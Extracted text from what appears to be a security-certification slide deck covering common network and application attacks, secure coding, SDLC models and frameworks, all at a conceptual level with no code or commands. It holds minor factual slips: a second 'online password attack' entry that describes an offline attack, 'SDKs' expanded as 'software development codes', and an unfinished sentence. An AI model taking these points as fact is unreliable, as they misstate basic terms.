2. Introduction
• Comparing common attacks
• Summarizing secure coding
concepts
• Identifying application attacks
• Understanding frameworks and
guides
3. Common
Attacks
• Denial-of-service (DoS)
– Comes from one system
• Distributed denial-of-service
(DDoS)
– Multiple attacking computers
– Typically include sustained,
abnormally high network traffic
4. Common
Attacks
• Privilege escalation
– Gain additional privileges after initial
exploit
• Spoofing
– Impersonating or masquerading
as someone or something else
– MAC spoofing
– IP spoofing
5. Common
Attacks
• SYN flood attack
– Common attack against Internet
servers
– Disrupts the TCP three-way handshake
– Withholds 3rd packet
7. Password
Attacks
• Online password attack
– Attempts to discover a password from an
online system
• Online password attack
– Attempts to discover passwords from a
captured database or captured packet scan
9. Common
Attacks
• Known plaintext
– Attacker has samples of both the plaintext
and the ciphertext
• Compare with chosen plaintext
The information contained in this email and any
accompanying attachments may contain proprietary
information about the Pay & Park & Pay parking garage.
Nr55tySu3IFIf7f3Cjn540fSs0j0QbshCN0yOAvhN3UKr85uE
kvawEPG3lhLIklwBz7hBzhaRZ96KUYIT3wQbf2cSkWHtN8Z
QrQ+ZGJHhe8HkL42CPjHIGc0HW4urJ+NNLnNxqHyRo34a
zbnXsd3qd3Ce5GE7blWtY0duwNKy0xqhmDihUJs9nDhXB
V4nBkZ6shcmKGEUSyvCr/hOEpAYw==
10. Common
Attacks
• Typo squatting / URL hijacking
– Attackers purchase similar domain names
for various malicious purposes
– Users visit the typo squatting domain when
they enter the URL incorrectly with a
common typo
• Clickjacking
– Tricks users into clicking something different
– Typically uses frames
11. Common
Attacks
• Session hijacking
– Impersonate the user with the session ID
– Session IDs stored in cookies
• Domain hijacking
– Attacker changes the registration of the
domain name
– Typically done by using social engineering
techniques to guess owner’s password
12. Common
Attacks
• Zero-day vulnerabilities
– Undocumented and unknown to the public
– Vendor might know about it, but has not yet
released a patch to address it
• Zero day attack
– Attempts to exploit zero-day vulnerabilities
– Also known as zero day- exploit
13. Memory
Buffer
Vulnerabilities
Application bugs
• Memory leak
– App consumes more and more memory
– Can crash operating system
• Integer overflow
– App attempts to use or create numeric value
too big for the available storage
– 8-bit storage
– 95 x 59 = 5,605 (needs at least 13 bits to
store)
14. Memory
Buffer
Vulnerabilities
• Buffer overflow and buffer overflow
attack
– Occur when an application receives data
that it can’t handle
– Exposes system memory
– Often includes NOP instructions (such as
x90)
– Can then insert malicious code into memory
– Input validation helps prevent buffer
overflow attacks
15. Secure Coding
Concepts
• Compiled code
– Optimized
– Run as an executable
– Compiler checks the program for errors and
• Runtime code
– Code is evaluated, interpreted, and executed
when the code is run
– HTML is interpreted by web browsers and
displayed as web pages
16. Input
Validation
• Verifies validity of data before using it
– Verifies proper characters
– Uses boundary and/or range checking
– Blocks HTML code
– Prevents the use of certain characters
• Client-side vs server-side
– Server-side is more secure (many sites use
both)
• Input validation prevents
– Buffer overflow, SQL injection, command
injection, and
cross-site scripting attacks
17. Secure Coding
Concepts
• Avoid race conditions
– Occur when two modules attempt to access
the same resource
– First module to complete the process wins
– Database locks prevent race conditions
18. Error and
Exception
Handling
• Catch errors and provides feedback
– Prevent improper input from crashing an
application providing information to
attackers
– Errors to users should be general
– Logged information should be detailed
20. Secure Coding
Concepts
• Code reuse
– Avoid dead code
• Software development codes (SDKs)
– Provide software tools easy to reuse
• Code obfuscation
– Camouflage code
21. Code Quality
and Testing
• Static code analyzers
• Dynamic analysis
• Stress testing
• Sandboxing
• Model verification
22. SDLC Models
Software development life cycle (SDLC)
models
• Waterfall
– Multiple stages going from top to bottom
– Strict
• Agile
– Starts with set of principles
– Uses iterative cycles with incremental
changes
– Flexible
24. Secure Coding
Concepts
• Change management
– Ensures developers do not make
unauthorized changes
– Provides accounting structure
• Version control
– Tracks software versions
– Identifies who made the change and when
25. Secure Coding
Concepts
• Provisioning (an application)
– Preparing to deploy it
– Configuring for different applications
• Deprovisioning (an application)
– Removing it completely
27. Application
Attacks
• Cross-site scripting (XSS)
– Attackers embed malicious HTML or
JavaScript code
– Can be in web site or links in email
– Prevented with server-side input
validation
– OWASP recommends use of library
28. Frameworks
and Guides
• Frameworks
– Regulatory
– Non-regulatory
– National versus international
– Industry-specific
• Guides
– Vendor-specific
– Platform-specific
– Role- or goal-specific